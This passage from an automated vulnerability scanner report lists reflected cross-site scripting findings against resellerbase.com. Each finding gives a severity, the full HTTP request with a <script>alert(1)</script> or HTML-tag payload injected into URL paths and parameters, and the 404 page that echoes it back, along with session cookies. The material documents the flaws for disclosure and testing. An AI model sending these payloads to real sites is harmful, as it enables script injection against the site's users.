Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67e6f<script>alert(1)</script>e0e4d85316e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67e6f<script>alert(1)</script>e0e4d85316e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&67e6f<script>alert(1)</script>e0e4d85316e=1 was not found on this server.</p>
...[SNIP]...

2.2626. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bc496<a>2bd36008879 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2bc496<a>2bd36008879 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2bc496<a>2bd36008879 was not found on this server.</p>
...[SNIP]...

2.2627. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ffb36<script>alert(1)</script>08f42f31406 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailffb36<script>alert(1)</script>08f42f31406/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailffb36<script>alert(1)</script>08f42f31406/38/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2628. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 618f6<script>alert(1)</script>ec09d31e591 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38618f6<script>alert(1)</script>ec09d31e591/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38618f6<script>alert(1)</script>ec09d31e591/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2629. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 741b6<script>alert(1)</script>4dcd84d8ef0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes741b6<script>alert(1)</script>4dcd84d8ef0/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes741b6<script>alert(1)</script>4dcd84d8ef0/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2630. http://www.resellerbase.com/detail/38/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 529ee<script>alert(1)</script>29977845c34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/search.php529ee<script>alert(1)</script>29977845c34?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php529ee<script>alert(1)</script>29977845c34?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2631. http://www.resellerbase.com/detail/38/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 31982<a>61f2b23a054 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search31982<a>61f2b23a054&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search31982<a>61f2b23a054&opt=2 was not found on this server.</p>
...[SNIP]...

2.2632. http://www.resellerbase.com/detail/38/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6f4c3<a>ecbca3941c6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...6f4c3<a>ecbca3941c6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...6f4c3<a>ecbca3941c6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2633. http://www.resellerbase.com/detail/38/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e66a2<script>alert(1)</script>17fe0773be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2&e66a2<script>alert(1)</script>17fe0773be3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=2&e66a2<script>alert(1)</script>17fe0773be3=1 was not found on this server.</p>
...[SNIP]...

2.2634. http://www.resellerbase.com/detail/38/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7ff65<a>d24c932093 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=27ff65<a>d24c932093 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/search.php?keyword=search...&Submit3=Search&opt=27ff65<a>d24c932093 was not found on this server.</p>
...[SNIP]...

2.2635. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d69f7<script>alert(1)</script>52170b51c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild69f7<script>alert(1)</script>52170b51c4c/38/whitelabelcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild69f7<script>alert(1)</script>52170b51c4c/38/whitelabelcash-com.html was not found on this server.</p>
...[SNIP]...

2.2636. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13676<a>f3261d2dcf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3813676<a>f3261d2dcf3/whitelabelcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3813676<a>f3261d2dcf3/whitelabelcash-com.html was not found on this server.</p>
...[SNIP]...

2.2637. http://www.resellerbase.com/detail/38/whitelabelcash-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/whitelabelcash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c93bb<script>alert(1)</script>00d3722fb72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/c93bb<script>alert(1)</script>00d3722fb72 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/c93bb<script>alert(1)</script>00d3722fb72 was not found on this server.</p>
...[SNIP]...

2.2638. http://www.resellerbase.com/detail/39/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c6b5<script>alert(1)</script>f2276c59e5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c6b5<script>alert(1)</script>f2276c59e5e/39/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c6b5<script>alert(1)</script>f2276c59e5e/39/ was not found on this server.</p>
...[SNIP]...

2.2639. http://www.resellerbase.com/detail/39/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 815fe<script>alert(1)</script>f2eb0264b27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39815fe<script>alert(1)</script>f2eb0264b27/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39815fe<script>alert(1)</script>f2eb0264b27/ was not found on this server.</p>
...[SNIP]...

2.2640. http://www.resellerbase.com/detail/39/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7d77<script>alert(1)</script>9d64f826211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/?f7d77<script>alert(1)</script>9d64f826211=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/?f7d77<script>alert(1)</script>9d64f826211=1 was not found on this server.</p>
...[SNIP]...

2.2641. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58950<script>alert(1)</script>eff6a5a8cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58950<script>alert(1)</script>eff6a5a8cd2/39/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58950<script>alert(1)</script>eff6a5a8cd2/39/rating.php was not found on this server.</p>
...[SNIP]...

2.2642. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba14a<script>alert(1)</script>d44f1af7daf89739e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailba14a<script>alert(1)</script>d44f1af7daf89739e/39/rating.php?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailba14a<script>alert(1)</script>d44f1af7daf89739e/39/rating.php?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2643. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27531<script>alert(1)</script>5da8b6dce1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3927531<script>alert(1)</script>5da8b6dce1d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3927531<script>alert(1)</script>5da8b6dce1d/rating.php was not found on this server.</p>
...[SNIP]...

2.2644. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48b9d<script>alert(1)</script>6ebda9e4a27a6a35a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

